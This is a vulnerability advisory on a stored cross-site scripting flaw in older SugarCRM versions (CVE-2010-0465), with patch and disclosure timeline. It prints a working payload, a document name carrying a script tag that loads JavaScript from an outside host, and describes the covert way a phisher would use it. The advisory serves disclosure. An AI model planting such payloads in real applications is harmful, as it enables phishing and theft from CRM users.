|
|
|
|
| |
Credit:
The information has been provided by Jeromie Jackson.
The original article can be found at: http://jeromiejackson.com/index.php/the-news/79-Spear-Phishing-SugarCRM-CustomerLists
|
| |
Vulnerable Systems:
* SugarCRM prior versions to 5.5.0a and 5.2.0l
There are two ways that have been used to exploit this vulnerability. In both instances, make a document with the following Document Name:
pwn3d<SCRIPT SRC="http://www.jeromiejackson.com/sugarcrm.js"></SCRIPT>
Example #1
Within the SugarCRM User Interface (UI) go to the Documents List. Click on the one just created. This will execute the script. You will see the script right in the document list- very obvious to most users that something doesn't look right. The next example is slighly more covert.
Example #2
Within the SugarCRM UI go to the Document List. Hover over the Document Name you just created, right-click, and then copy the URL location. You will see the URL does not have any of the scripting, it has been replaced with queries directly to a Record variable within the application. This would probably be the tact a Phisher would take.
Patch Availability:
A patch has been made available via the vendor. It is recommended a routine to sanitize user input be consistently implemented throughout the application to mitigate other such occurrences within the application.
CVE Information:
CVE-2010-0465
Disclosure Timeline:
Vendor Contact: February 18, 2010
Vendor Response: February 19, 2010
Patch Available: March 10, 2010
|
|
|
|
|
